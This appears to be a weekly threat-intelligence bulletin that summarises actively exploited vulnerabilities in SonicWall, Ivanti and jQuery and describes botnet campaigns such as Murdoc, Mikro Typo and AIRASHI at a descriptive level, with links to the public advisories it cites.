This week, CISA has added a five-year-old jQuery vulnerability to its KEV catalog, highlighting its continued risk to systems.  Additionally, zero-day exploitation has been detected in SonicWall SMA1000 appliances, signaling active attacks targeting vulnerable systems. In a joint advisory, CISA and the FBI warned of an ongoing, sophisticated exploit chain targeting Ivanti Cloud Service Appliance, where multiple vulnerabilities are being leveraged by threat actors to orchestrate complex attacks.  

The botnet ecosystem remains highly active, with botnets like EnemyBot and Sysrv-K exploiting vulnerabilities in the Spring Cloud Gateway. Meanwhile, the IoT Reaper botnet has been exploiting a 12-year-old Cisco router vulnerability, underscoring the risks posed by legacy systems. Long-standing threats, including Mirai and Tsunami, continue to target outdated infrastructure using a nine-year-old flaw in the Eir D1000 Modem.

The Murdoc Botnet, a variant of the Mirai campaign, exploited vulnerabilities in AVTECH Cameras and Huawei HG532 routers to compromise IoT devices. Similarly, the AIRASHI Botnet targeted weaknesses in AVTECH IP cameras, LILIN DVRs, and Shenzhen TVT products to launch large-scale DDoS attacks. Additionally, the "Mikro Typo" botnet leveraged a global network of compromised MikroTik routers to send malicious emails.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-23006

A Pre-authentication Remote Code Execution Vulnerability has been discovered in SonicWall SMA1000 Appliance Management Console (AMC) and Central Management Console (CMC) versions 12.4.3-02804 and prior. This zero-day vulnerability, discovered and reported by the Microsoft Threat Intelligence Center (MSTIC), allows attackers to execute arbitrary code on affected devices without any prior authentication. SonicWall's PSIRT has issued an urgent warning, as active exploitation of this flaw is likely underway.

CVE-2024-8190

An OS Command Injection Vulnerability in Ivanti Cloud Service Appliance enables remote authenticated attacker to execute arbitrary code. CISA and the FBI issued a joint advisory revealing that this vulnerability has been exploited as part of an attack chain, utilizing CVE-2024-8963 and CVE-2024-9380. This chain enables threat actors to gain initial access, execute remote code (RCE), steal credentials, and deploy web shells on compromised networks. This vulnerability was added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog in September 2024.  

CVE-2024-8963

A Path Traversal Vulnerability in Ivanti Cloud Service Appliance enables attackers to bypass administrative authentication and execute arbitrary commands. In a joint advisory, CISA and the FBI disclosed that this vulnerability is being actively exploited in conjunction with CVE-2024-8190, CVE-2024-9379 and CVE-2024-9380 as part of an attack chain. This exploitation enables threat actors to gain initial access, perform remote code execution (RCE), harvest credentials, and deploy web shells on targeted networks. This vulnerability was added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog in September 2024.  

CVE-2024-9379

An SQL Injection Vulnerability in the Ivanti Cloud Service Appliance enables a remote, authenticated attacker with administrator privileges to execute arbitrary SQL commands.  In a joint advisory, CISA and the FBI disclosed that this vulnerability is being actively exploited in conjunction with CVE-2024-8963 as part of an attack chain. This exploitation enables threat actors to gain initial access, perform remote code execution (RCE), harvest credentials, and deploy web shells on targeted networks. This vulnerability was added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog in October 2024.  

CVE-2024-9380  

A Command Injection Vulnerability in the Ivanti Cloud Service Appliance enables a remote, authenticated attacker with administrator privileges to execute arbitrary commands on the system. In a joint advisory, CISA and the FBI disclosed that this vulnerability is being actively exploited in conjunction with CVE-2024-8190, CVE-2024-8963 and CVE-2024-9379 as part of an attack chain. This exploitation enables threat actors to gain initial access, perform remote code execution (RCE), harvest credentials, and deploy web shells on targeted networks. This vulnerability was added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog in October 2024.  

CVE-2020-11023

A Cross-Site Scripting Vulnerability in jQuery versions 1.0.3 through 3.4.1, caused by appending HTML containing option elements, has been identified as a critical security risk. Despite being a five-year-old vulnerability, it remains significant due to its association with malware families, including OceanSalt, Auriga, Bangat, BISCUIT, MAPIGET, TARSIP, SEASALT, KURTON, and HELAUTO. Although this vulnerability was addressed in jQuery 3.5.0, this vulnerability was recently included in the CISA Known Exploited Vulnerabilities (KEV) Catalog, emphasizing its continued exploitation in cybersecurity incidents.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.    

CVE-2024-7029 and CVE-2017-17215

The Qualys Threat Research Unit has uncovered a significant, ongoing operation within the Mirai campaign, known as the Murdoc Botnet. This variant targets vulnerabilities in AVTECH Cameras and Huawei HG532 routers, exploiting them to gain initial access to Internet of Things (IoT) devices. Active since at least July 2024, the campaign has infected over 1,370 systems, with most victims located in Malaysia, Mexico, Thailand, Indonesia, and Vietnam. The botnet uses known security flaws to compromise devices and deploy its next-stage payload through a shell script.  

CVE-2023-30799

A Privilege Escalation Vulnerability in MikroTik RouterOS has been exploited to create a global botnet of approximately 13,000 compromised MikroTik routers. Codenamed "Mikro Typo," the campaign leverages misconfigured DNS records to bypass email protection measures, enabling malicious emails to appear as though they originate from legitimate domains. According to Infoblox researcher David Brunsdon, the botnet has been used in spam campaigns, with a notable instance in late November 2024 involving freight invoice-themed lures to deliver malicious ZIP archive payloads. While the initial access vector remains unclear, the operation affects multiple firmware versions of MikroTik routers, highlighting the risks of unpatched vulnerabilities and misconfigured devices.  

AIRASHI Botnet powers large-scale DDoS attacks

Threat actors are actively exploiting an undisclosed zero-day vulnerability in Cambium Networks cnPilot routers to deploy a variant of the AISURU botnet, known as AIRASHI, to carry out distributed denial-of-service (DDoS) attacks. These attacks, active since June 2024 according to QiAnXin XLab, rely on an unpatched security flaw, with details intentionally withheld to prevent further abuse. The AIRASHI Botnet also exploits multiple known vulnerabilities in devices such as AVTECH IP cameras, LILIN DVRs, and Shenzhen TVT products to enhance its impact. Most of the compromised devices are in Brazil, Russia, Vietnam, and Indonesia, while the botnet’s DDoS campaigns primarily target China, the United States, Poland, and Russia.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/01/23/cisa-adds-one-known-exploited-vulnerability-catalog  
2. https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-022a  
3. https://www.cisa.gov/news-events/alerts/2025/01/22/cisa-and-fbi-release-advisory-how-threat-actors-chained-vulnerabilities-ivanti-cloud-service  
4. https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0002  
5. https://blog.qualys.com/vulnerabilities-threat-research/2025/01/21/mass-campaign-of-murdoc-botnet-mirai-a-new-variant-of-corona-mirai  
6. https://blogs.infoblox.com/threat-intelligence/one-mikro-typo-how-a-simple-dns-misconfiguration-enables-malware-delivery-by-a-russian-botnet/  
7. https://blog.xlab.qianxin.com/large-scale-botnet-airashi-en/